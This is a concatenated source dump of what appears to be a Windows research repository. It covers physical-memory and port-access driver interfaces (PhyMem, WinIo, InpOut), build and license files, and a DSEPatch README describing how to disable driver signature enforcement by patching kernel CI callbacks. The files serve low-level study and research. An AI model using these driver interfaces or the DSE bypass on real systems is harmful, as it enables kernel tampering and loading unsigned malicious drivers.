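        // truncates the address on 64-bit builds.
        printf("mapped virtual address = 0x%p\n", (void*)va);
        UnmapPhyMem(va, 20);
    }
    else
    {
        // NOTE(review): assumes MapPhyMem reports failure as NULL - confirm in pmdll.
        printf("map physical memory failed\n");
    }

    /*
    DWORD d=ReadPortByte(0x379);
    WritePortLong(0x378, 10);
    d=ReadPortLong(0x378);
    */

    //enumerate PCI bus
    for (int bus = 0; bus <= 255; bus++)
    {
        for (int dev = 0; dev <= 31; dev++)
        {
            for (int func = 0; func <= 7; func++)
            {
                // Initialised so a failed read never leaves garbage behind.
                DWORD dev_ven = 0;

                // Register offset 0, 4 bytes: low word is printed as the
                // vendor ID, high word as the device ID.
                if (!ReadPCI(bus, dev, func, 0, 4, &dev_ven))
                    continue;

                // A vendor ID of 0xFFFF is skipped (no function at this address).
                if (LOWORD(dev_ven) != 0xFFFF)
                    printf("Bus %d, Device %d, Function %d, Vendor ID 0x%x, Device ID 0x%x\n",
                        bus, dev, func, LOWORD(dev_ven), HIWORD(dev_ven));
            }
        }
    }

    printf("end");
    getchar();

    // Unload the driver so the physical-memory interface does not stay
    // available after the test has finished.
    UnloadPhyMemDriver();
    return 0;
}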
50 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/OpenLS.rc:
--------------------------------------------------------------------------------
1 | /////////////////////////////////////////////////////////////////////////////
2 | //
3 | // Version
4 | //
5 | VS_VERSION_INFO VERSIONINFO
6 | FILEVERSION 1,2,0,5
7 | PRODUCTVERSION 1,2,0,5
8 | FILEFLAGSMASK 0x3fL
9 | FILEFLAGS 0x0L
10 | FILEOS 0x40004L
11 | FILETYPE 0x2L
12 | FILESUBTYPE 0x0L
13 | BEGIN
14 | BLOCK "StringFileInfo"
15 | BEGIN
16 | BLOCK "041104b0"
17 | BEGIN
18 | VALUE "Comments", "The modified BSD license\0"
19 | VALUE "CompanyName", "OpenLibSys.org\0"
20 | VALUE "FileDescription", "WinRing0.vxd\0"
21 | VALUE "FileVersion", "1.2.0.5\0"
22 | VALUE "InternalName", "WinRing0.vxd\0"
23 | VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0"
24 | VALUE "OriginalFilename", "WinRing0.vxd\0"
25 | VALUE "ProductName", "WinRing0\0"
26 | VALUE "ProductVersion", "1.2.0.5\0"
27 | END
28 | END
29 | BLOCK "VarFileInfo"
30 | BEGIN
31 | VALUE "Translation", 0x411, 1200
32 | END
33 | END
34 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 - 2025 hfiref0x
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.271
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DSEPatch", "DSEPatch\DSEPatch.vcxproj", "{75CEED88-EA4C-4F16-AC88-5F223AAB0591}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.ActiveCfg = Debug|x64
15 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.Build.0 = Debug|x64
16 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.ActiveCfg = Release|x64
17 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {903A1DAC-7E4E-4237-BA77-08CB08936EA9}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.168
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "srvany", "srvany2\srvany2.vcxproj", "{DA2D114B-786B-4999-8338-7D2A772EAE69}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x86 = Debug|x86
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.ActiveCfg = Debug|Win32
15 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.Build.0 = Debug|Win32
16 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.ActiveCfg = Release|Win32
17 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.Build.0 = Release|Win32
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {9159E424-291B-45AC-B085-CD7D7837B77D}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/classfactory.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
/*
 * Container-of helpers for C-style COM objects.
 * _IOffset  - byte offset of member `itf` inside `Class`, obtained by taking
 *             the member's address through a null `Class` pointer.
 * IToClass  - given `pitf`, a pointer to the `itf` member, steps back by that
 *             offset and yields a pointer to the enclosing `Class`.
 * IToClassN - alias of IToClass.
 */
3 | #define _IOffset(Class, itf) ((UINT_PTR)&(((Class *)0)->itf))
4 | #define IToClass(Class, itf, pitf) ((Class *)(((LPSTR)pitf)-_IOffset(Class, itf)))
5 | #define IToClassN(Class, itf, pitf) IToClass(Class, itf, pitf)
6 |
/* Signature of the per-class creation callback stored in CClassFactory. */
7 | typedef HRESULT(CALLBACK *LPFNCREATEINSTANCE)(IUnknown *pUnkOuter, REFIID riid, void **ppvObject);
8 |
/*
 * Class-factory record: the IClassFactory vtable pointer comes first, followed
 * by the CLSID the factory serves and the callback that creates the object.
 */
9 | typedef struct _CClassFactory {
10 | const IClassFactoryVtbl *cf; // IClassFactory vtable pointer
11 | const CLSID *pclsid; // CLSID associated with this factory entry
12 | LPFNCREATEINSTANCE lpfnCreateInstance; // creation callback for that CLSID
13 | } CClassFactory, *PCClassFactory;
14 |
/*
 * Defines a constant GUID named `name` with C linkage. DECLSPEC_SELECTANY
 * lets the definition live in a header that several translation units include.
 */
15 | #define AMSI_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
16 | EXTERN_C const GUID DECLSPEC_SELECTANY name \
17 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
18 |
/* CLSID of this provider and the IID of the antimalware provider interface (per the names). */
19 | AMSI_DEFINE_GUID(CLSID_AmsiProvider, 0x1c0643e1, 0x5b0a, 0x4420, 0x9b, 0x76, 0x0d, 0xe9, 0x26, 0x4b, 0x4c, 0x59);
20 | AMSI_DEFINE_GUID(IID_AntimalwareProvider, 0xb2cabfe3, 0xfe04, 0x42b1, 0xa5, 0xdf, 0x08, 0xd4, 0x83, 0xd4, 0xd1, 0x25);
21 |
22 |
/* Module reference counting; both return a LONG (presumably the updated count - TODO confirm). */
23 | STDAPI_(LONG) DllAddRef();
24 | STDAPI_(LONG) DllRelease();
25 |
/* Table of class-factory records, defined in another translation unit. */
26 | extern const CClassFactory g_clsmap[];
27 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/ApiSetSchemaView.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28010.2048
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ApiSetSchemaView", "ApiSetSchemaView.vcxproj", "{91352FD7-5569-4D5D-8677-735C8925A3B8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.ActiveCfg = Debug|x64
15 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.Build.0 = Debug|x64
16 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.ActiveCfg = Release|x64
17 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {82481A72-5B56-4EC1-98A9-64BB64B2BCDA}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/winio.h:
--------------------------------------------------------------------------------
1 | #ifndef WINIO_H
2 | #define WINIO_H
3 |
4 | #include "..\drv\winio_nt.h"
5 |
6 | #ifndef WINIO_DLL
7 | #define WINIO_API _declspec(dllimport)
8 | #else
9 | #define WINIO_API
10 | #endif
11 |
/*
 * Public WinIo DLL interface, exported with C linkage and _stdcall.
 * WINIO_API expands to _declspec(dllimport) for clients and to nothing when
 * the DLL itself is built (WINIO_DLL defined).
 *
 * NOTE(review): as named, these exports hand the calling process read/write
 * access to physical memory and to I/O ports. None of the prototypes carries
 * a range or permission argument, so any restriction would have to be
 * enforced elsewhere (driver or device ACL) - confirm in the driver source.
 */
12 | extern "C"
13 | {
// Library start-up and shutdown.
14 | WINIO_API bool _stdcall InitializeWinIo();
15 | WINIO_API void _stdcall ShutdownWinIo();
// Map / unmap physical memory; tagPhysStruct is not declared in this header
// (presumably it comes from winio_nt.h, included above - TODO confirm).
16 | WINIO_API PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct);
17 | WINIO_API bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct);
// Read / write one DWORD at a physical address.
18 | WINIO_API bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal);
19 | WINIO_API bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal);
// Read / write an I/O port; bSize presumably selects the access width in bytes - TODO confirm.
20 | WINIO_API bool _stdcall GetPortVal(WORD wPortAddr, PDWORD pdwPortVal, BYTE bSize);
21 | WINIO_API bool _stdcall SetPortVal(WORD wPortAddr, DWORD dwPortVal, BYTE bSize);
// Driver installation / removal; IsDemandLoaded defaults to false.
22 | WINIO_API bool _stdcall InstallWinIoDriver(PWSTR pszWinIoDriverPath, bool IsDemandLoaded = false);
23 | WINIO_API bool _stdcall RemoveWinIoDriver();
24 | }
25 |
// DLL-internal state shared between source files (not exported through WINIO_API).
26 | extern HANDLE hDriver;
27 | extern bool IsWinIoInitialized;
28 | extern bool g_Is64BitOS;
29 |
// Internal helpers that start and stop the driver; not exported through WINIO_API.
30 | bool _stdcall StartWinIoDriver();
31 | bool _stdcall StopWinIoDriver();
32 |
33 | #endif
34 |
--------------------------------------------------------------------------------
/source/DSEPatch/README.md:
--------------------------------------------------------------------------------
1 |
2 | # DSEPatch
3 | ## Windows x64 Driver Signature Enforcement Overrider
4 |
5 | # System Requirements
6 |
7 | x64 Windows Vista/7/8/8.1/10.
8 |
9 | Windows 10: warning, see PatchGuard note below.
10 |
11 | DSEPatch is designed only for x64 Windows.
12 |
13 | Administrative privilege is required.
14 |
15 | Obsolete, do not use, see PatchGuard note below.
16 |
17 | # Build
18 |
19 | DSEPatch comes with full source code.
20 | In order to build from source you need Microsoft Visual Studio 2013 U4 or a later version.
21 |
22 | # How it works
23 |
24 | It uses the WinNT/Turla VirtualBox kernel mode exploit technique to "patch" the ntoskrnl callback structure filled in by CI.dll. This structure is named g_CiCallbacks on Windows 7 and SeCiCallbacks on everything above. DSEPatch replaces the CiValidateImageHeader and CiValidateImageData callbacks in this structure with a stub routine that always returns STATUS_SUCCESS. The original state can be restored - run dsepatch with the -r command, e.g. dsepatch -r
25 |
26 | AS-IS, no warranty.
27 |
28 | # PatchGuard incompatibility
29 |
30 | Windows 10 PatchGuard detects this modification and bugchecks the system. Bugcheck is 0x109 (CRITICAL_STRUCTURE_CORRUPTION), type 0 - generic data region.
31 |
32 | # Authors
33 |
34 | (c) 2016 - 2019 DSEPatch Project
35 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/ReadMe.txt:
--------------------------------------------------------------------------------
1 | InpOut32Drv Driver Interface DLL
2 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3 |
4 | Modified for x64 compatibility and built by Phillip Gibbons (Phil@highrez.co.uk).
5 | See http://www.highrez.co.uk/Downloads/InpOut32 or the Highrez Forums (http://forums.highrez.co.uk) for information.
6 | Many thanks to Red Fox UK for supporting the community and providing Driver signatures allowing Vista/7 x64 compatibility.
7 |
8 |
9 |
10 | Based on the original written by Logix4U (www.logix4u.net).
11 |
12 |
13 | Notes:
14 |
15 | The InpOut32 device driver supports writing to "old fashioned" hardware port addresses.
16 | It does NOT support USB devices such as USB Parallel ports or even PCI parallel ports (as I am led to believe).
17 |
18 |
19 | The device driver is installed at runtime. Doing so, however, requires administrator privileges.
20 | On Vista & later, using UAC, you can run the InstallDriver.exe in the \Win32 folder to install the driver
21 | appropriate for your OS. Doing so will request elevation and ask for your permission (or for the administrator
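22 | password). Once the driver is installed for the first time, it can then be used by any user *without*
23 | administrator privileges; that is, port access through the driver is from then on available to every local user of the machine.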
24 |
25 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:2.0.50727.4927
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace DumpPhys.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:2.0.50727.4927
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace DumpPort.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) <2003-2015> Phil Gibbons
2 | Portions Copyright (c) <2000>
3 |
4 | Permission is hereby granted, free of charge, to any person obtaining a copy
5 | of this software and associated documentation files (the "Software"), to deal
6 | in the Software without restriction, including without limitation the rights
7 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
8 | copies of the Software, and to permit persons to whom the Software is
9 | furnished to do so, subject to the following conditions:
10 |
11 |
12 |
13 | The above copyright notice and this permission notice shall be included in
14 | all copies or substantial portions of the Software.
15 |
16 |
17 |
18 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
24 | THE SOFTWARE.
--------------------------------------------------------------------------------
/source/wdextract/wdextract/wdextract.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.h:
--------------------------------------------------------------------------------
1 | #ifndef __PMDLL_H
2 | #define __PMDLL_H
3 |
4 | #ifdef PMDLL_EXPORTS
5 | #define DLL_DECLARE __declspec(dllexport)
6 | #else
7 | #define DLL_DECLARE __declspec(dllimport)
8 | #endif
9 |
10 | #ifdef __cplusplus
11 | extern "C"
12 | {
13 | #endif
14 |
15 | // Driver lifetime. LoadPhyMemDriver returns FALSE on failure (the bundled test.cpp reports "load phymem.sys failed" in that case).
16 | DLL_DECLARE BOOL LoadPhyMemDriver();
17 | DLL_DECLARE VOID UnloadPhyMemDriver();
18 |
19 | // Map physical memory into user space. phyAddr and memSize are DWORDs, so only
// 32-bit physical addresses and sizes can be expressed. The prototypes take no
// access-mode or range-limit argument; any restriction would have to live in the
// DLL or driver implementation - NOTE(review): confirm there.
20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize);
21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize);
22 |
23 | // I/O port access in byte / word / dword widths; port addresses are 16-bit (WORD).
24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr);
25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr);
26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr);
27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue);
28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue);
29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue);
30 |
31 | // PCI configuration-space access addressed by bus / device / function and register
// offset; `bytes` is the transfer size and pValue the caller's buffer. The BOOL
// result is tested as success by the bundled test.cpp.
32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum,
33 | DWORD regOff, DWORD bytes, PVOID pValue);
34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum,
35 | DWORD regOff, DWORD bytes, PVOID pValue);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif //__PMDLL_H
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.h:
--------------------------------------------------------------------------------
1 | #ifndef __PMDLL_H
2 | #define __PMDLL_H
3 |
4 | #ifdef PMDLL_EXPORTS
5 | #define DLL_DECLARE __declspec(dllexport)
6 | #else
7 | #define DLL_DECLARE __declspec(dllimport)
8 | #endif
9 |
10 | #ifdef __cplusplus
11 | extern "C"
12 | {
13 | #endif
14 |
15 | // Driver lifetime. LoadPhyMemDriver returns FALSE on failure (test.cpp in this folder reports "load phymem.sys failed" in that case).
16 | DLL_DECLARE BOOL LoadPhyMemDriver();
17 | DLL_DECLARE VOID UnloadPhyMemDriver();
18 |
19 | // Map physical memory into user space. phyAddr and memSize are DWORDs, so only
// 32-bit physical addresses and sizes can be expressed. The prototypes take no
// access-mode or range-limit argument; any restriction would have to live in the
// DLL or driver implementation - NOTE(review): confirm there.
20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize);
21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize);
22 |
23 | // I/O port access in byte / word / dword widths; port addresses are 16-bit (WORD).
24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr);
25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr);
26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr);
27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue);
28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue);
29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue);
30 |
31 | // PCI configuration-space access addressed by bus / device / function and register
// offset; `bytes` is the transfer size and pValue the caller's buffer. test.cpp
// treats a nonzero BOOL result as success.
32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum,
33 | DWORD regOff, DWORD bytes, PVOID pValue);
34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum,
35 | DWORD regOff, DWORD bytes, PVOID pValue);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif //__PMDLL_H
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/source/StripDebug/global.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | //disable nonmeaningful warnings.
4 | #pragma warning(disable: 4091) //'typedef ': ignored on left of '' when no variable is declared
5 | #pragma warning(disable: 4005) // macro redefinition
6 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
7 | #pragma warning(disable: 4054) // %s : from function pointer %s to data pointer %s
8 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u
9 |
10 | #include
11 | #include
12 | #include "cui.h"
13 | #include "minirtl\minirtl.h"
14 | #include "minirtl\cmdline.h"
15 |
16 | #pragma comment(lib, "dbghelp.lib")
17 | #pragma comment(lib, "imagehlp.lib")
18 |
19 | #if !defined UNICODE
20 | #error ANSI build is not supported
21 | #endif
22 |
23 | #if defined (_MSC_VER)
24 | #if (_MSC_VER >= 1910)
25 | #ifdef _DEBUG
26 | #pragma comment(lib, "vcruntimed.lib")
27 | #pragma comment(lib, "ucrtd.lib")
28 | #else
29 | #pragma comment(lib, "libucrt.lib")
30 | #pragma comment(lib, "libvcruntime.lib")
31 | #endif
32 | #endif
33 | #endif
34 |
35 | #define IMAGE_DEBUG_TYPE_POGO 13
36 |
37 | PIMAGE_NT_HEADERS WINAPI CheckSumMappedFile(
38 | _In_ PVOID BaseAddress,
39 | _In_ DWORD FileLength,
40 | _Out_ PDWORD HeaderSum,
41 | _Out_ PDWORD CheckSum
42 | );
43 |
44 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinIo", "WinIo.vcproj", "{DE9A75D4-D640-41B8-893B-A384FAF00738}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.Build.0 = Debug|Win32
16 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.ActiveCfg = Debug|x64
17 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.Build.0 = Debug|x64
18 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.ActiveCfg = Release|Win32
19 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.Build.0 = Release|Win32
20 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.ActiveCfg = Release|x64
21 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/win32u.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPhys", "DumpPhys\DumpPhys.csproj", "{1103585F-D85D-4599-8858-C0D3E9D7419F}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Any CPU = Debug|Any CPU
9 | Debug|x86 = Debug|x86
10 | Release|Any CPU = Release|Any CPU
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.ActiveCfg = Debug|x86
